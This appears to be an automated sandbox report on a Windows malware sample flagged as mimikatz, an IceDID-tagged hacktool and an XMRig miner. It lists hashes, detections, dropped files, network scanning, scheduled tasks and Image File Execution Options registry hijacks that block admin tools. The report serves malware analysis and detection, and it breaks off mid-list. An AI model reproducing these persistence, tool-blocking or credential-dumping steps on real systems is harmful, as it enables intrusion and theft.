Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system -
submitted
23-04-2024 00:50
Behavioral task
behavioral1
Sample
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
Resource
win7-20240221-en
General
-
Target
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
-
Size
8.5MB
-
MD5
528357739aa4f0b9a2af7ad036639828
-
SHA1
854fd936c1fba4aa9e36324b1a8c10503a497dc9
-
SHA256
32dc01238f295ae4722a2c1e4db252d661e8bc95349deacd445ac79798b85209
-
SHA512
7e7ea4415b6e8cc3f0913e224806f288bae95bb24e5a8ef5b4390af3081dde690370cd7a74f3db9742858ef489340c0aa9bb24bc8dc074dd39b09171511bc451
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
Processes:
simzbkl.exedescription pid process target process PID 1836 created 2096 1836 simzbkl.exe spoolsv.exe -
Contacts a large (30499) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
Processes:
resource yara_rule behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 39 IoCs
Processes:
resource yara_rule behavioral2/memory/456-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX C:\Windows\tbzbbivf\simzbkl.exe UPX C:\Windows\gtuqsjqjh\Corporate\vfshost.exe UPX behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp UPX behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp UPX C:\Windows\Temp\gtuqsjqjh\vmebnmlbn.exe UPX behavioral2/memory/3224-140-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/3224-157-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX C:\Windows\Temp\bvzeemvvy\gzbahn.exe UPX behavioral2/memory/2172-161-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/4680-170-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/60-174-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2344-178-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-180-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/440-183-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/4156-188-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/3752-192-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/4568-196-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-199-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/4088-201-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2876-209-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/1048-213-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-215-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/4692-218-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/1652-222-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-224-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/1488-227-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/4332-230-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/1988-232-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-233-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2248-234-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2248-236-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/3572-238-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp UPX behavioral2/memory/2172-249-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2172-250-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2172-251-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2172-254-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2172-256-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX behavioral2/memory/2172-257-0x00007FF725730000-0x00007FF725850000-memory.dmp UPX -
XMRig Miner payload 11 IoCs
Processes:
resource yara_rule behavioral2/memory/2172-180-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-199-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-215-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-224-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-233-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-249-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-250-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-251-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-254-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-256-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig behavioral2/memory/2172-257-0x00007FF725730000-0x00007FF725850000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral2/memory/456-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz C:\Windows\tbzbbivf\simzbkl.exe mimikatz behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp mimikatz behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
Processes:
simzbkl.exewpcap.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts simzbkl.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts simzbkl.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid process 3760 netsh.exe 1528 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
Processes:
simzbkl.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe simzbkl.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" simzbkl.exe -
Executes dropped EXE 29 IoCs
Processes:
simzbkl.exesimzbkl.exewpcap.exeeebtnglvf.exevfshost.exevmebnmlbn.exexohudmc.exenslfoo.exegzbahn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exesimzbkl.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exebvbvfuizb.exesimzbkl.exepid process 5100 simzbkl.exe 1836 simzbkl.exe 4304 wpcap.exe 924 eebtnglvf.exe 2776 vfshost.exe 3224 vmebnmlbn.exe 1180 xohudmc.exe 2776 nslfoo.exe 2172 gzbahn.exe 4680 vmebnmlbn.exe 60 vmebnmlbn.exe 2344 vmebnmlbn.exe 440 vmebnmlbn.exe 4156 vmebnmlbn.exe 3752 vmebnmlbn.exe 4568 vmebnmlbn.exe 4088 vmebnmlbn.exe 2016 simzbkl.exe 2876 vmebnmlbn.exe 1048 vmebnmlbn.exe 4692 vmebnmlbn.exe 1652 vmebnmlbn.exe 1488 vmebnmlbn.exe 4332 vmebnmlbn.exe 1988 vmebnmlbn.exe 2248 vmebnmlbn.exe 3572 vmebnmlbn.exe 4236 bvbvfuizb.exe 5508 simzbkl.exe -
Loads dropped DLL 12 IoCs
Processes:
wpcap.exeeebtnglvf.exepid process 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 4304 wpcap.exe 924 eebtnglvf.exe 924 eebtnglvf.exe 924 eebtnglvf.exe -
Processes:
resource yara_rule C:\Windows\gtuqsjqjh\Corporate\vfshost.exe upx behavioral2/memory/2776-135-0x00007FF691840000-0x00007FF69192E000-memory.dmp upx behavioral2/memory/2776-136-0x00007FF691840000-0x00007FF69192E000-memory.dmp upx C:\Windows\Temp\gtuqsjqjh\vmebnmlbn.exe upx behavioral2/memory/3224-140-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/3224-157-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx C:\Windows\Temp\bvzeemvvy\gzbahn.exe upx behavioral2/memory/2172-161-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/4680-170-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/60-174-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2344-178-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-180-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/440-183-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/4156-188-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/3752-192-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/4568-196-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-199-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/4088-201-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2876-209-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/1048-213-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-215-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/4692-218-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/1652-222-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-224-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/1488-227-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/4332-230-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/1988-232-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-233-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2248-234-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2248-236-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/3572-238-0x00007FF7A44B0000-0x00007FF7A450B000-memory.dmp upx behavioral2/memory/2172-249-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2172-250-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2172-251-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2172-254-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2172-256-0x00007FF725730000-0x00007FF725850000-memory.dmp upx behavioral2/memory/2172-257-0x00007FF725730000-0x00007FF725850000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 137 ifconfig.me 138 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
Processes:
wpcap.exesimzbkl.exexohudmc.exedescription ioc process File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 simzbkl.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content simzbkl.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 simzbkl.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\nslfoo.exe xohudmc.exe -
Drops file in Program Files directory 3 IoCs
Processes:
wpcap.exedescription ioc process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
Processes:
simzbkl.exebvbvfuizb.execmd.exe2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exedescription ioc process File created C:\Windows\gtuqsjqjh\UnattendGC\specials\exma-1.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\ucl.dll simzbkl.exe File opened for modification C:\Windows\tbzbbivf\svschost.xml simzbkl.exe File opened for modification C:\Windows\tbzbbivf\schoedcl.xml simzbkl.exe File opened for modification C:\Windows\gtuqsjqjh\bnafefjyn\Result.txt bvbvfuizb.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\bvbvfuizb.exe simzbkl.exe File opened for modification C:\Windows\tbzbbivf\spoolsrv.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\svschost.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\posh-0.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\tucl-1.dll simzbkl.exe File created C:\Windows\tbzbbivf\vimpcsvc.xml simzbkl.exe File opened for modification C:\Windows\tbzbbivf\docmicfg.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\cnli-1.dll simzbkl.exe File created C:\Windows\tbzbbivf\schoedcl.xml simzbkl.exe File opened for modification C:\Windows\gtuqsjqjh\Corporate\log.txt cmd.exe File created C:\Windows\tbzbbivf\docmicfg.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\ssleay32.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\xdvl-0.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\schoedcl.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\spoolsrv.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\docmicfg.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\AppCapture32.dll simzbkl.exe File created C:\Windows\tbzbbivf\simzbkl.exe 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe File created C:\Windows\ime\simzbkl.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\vimpcsvc.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\scan.bat simzbkl.exe File opened for modification C:\Windows\gtuqsjqjh\bnafefjyn\Packet.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\svschost.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\libxml2.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\vimpcsvc.xml simzbkl.exe File created C:\Windows\tbzbbivf\spoolsrv.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\spoolsrv.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\libeay32.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\AppCapture64.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\coli-0.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\zlib1.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\schoedcl.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\crli-0.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\ip.txt simzbkl.exe File created C:\Windows\gtuqsjqjh\Corporate\mimidrv.sys simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\vimpcsvc.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\docmicfg.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\trfo-2.dll simzbkl.exe File created C:\Windows\tbzbbivf\svschost.xml simzbkl.exe File opened for modification C:\Windows\tbzbbivf\vimpcsvc.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\Shellcode.ini simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\Packet.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\trch-1.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\docmicfg.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\Corporate\vfshost.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe simzbkl.exe File created C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\svschost.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\schoedcl.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\spoolsrv.xml simzbkl.exe File created C:\Windows\gtuqsjqjh\Corporate\mimilib.dll simzbkl.exe File created C:\Windows\gtuqsjqjh\upbdrjv\swrpwe.exe simzbkl.exe File opened for modification C:\Windows\tbzbbivf\simzbkl.exe 2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe File created C:\Windows\gtuqsjqjh\UnattendGC\specials\tibe-2.dll simzbkl.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid process 4464 sc.exe 956 sc.exe 4784 sc.exe 2864 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
Processes:
resource yara_rule C:\Windows\tbzbbivf\simzbkl.exe nsis_installer_2 C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe nsis_installer_1 C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 4284 schtasks.exe 956 schtasks.exe 400 schtasks.exe -
Modifies data under HKEY_USERS 45 IoCs
Processes:
vmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exesimzbkl.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exevmebnmlbn.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump vmebnmlbn.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ simzbkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" simzbkl.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" vmebnmlbn.exe Key created 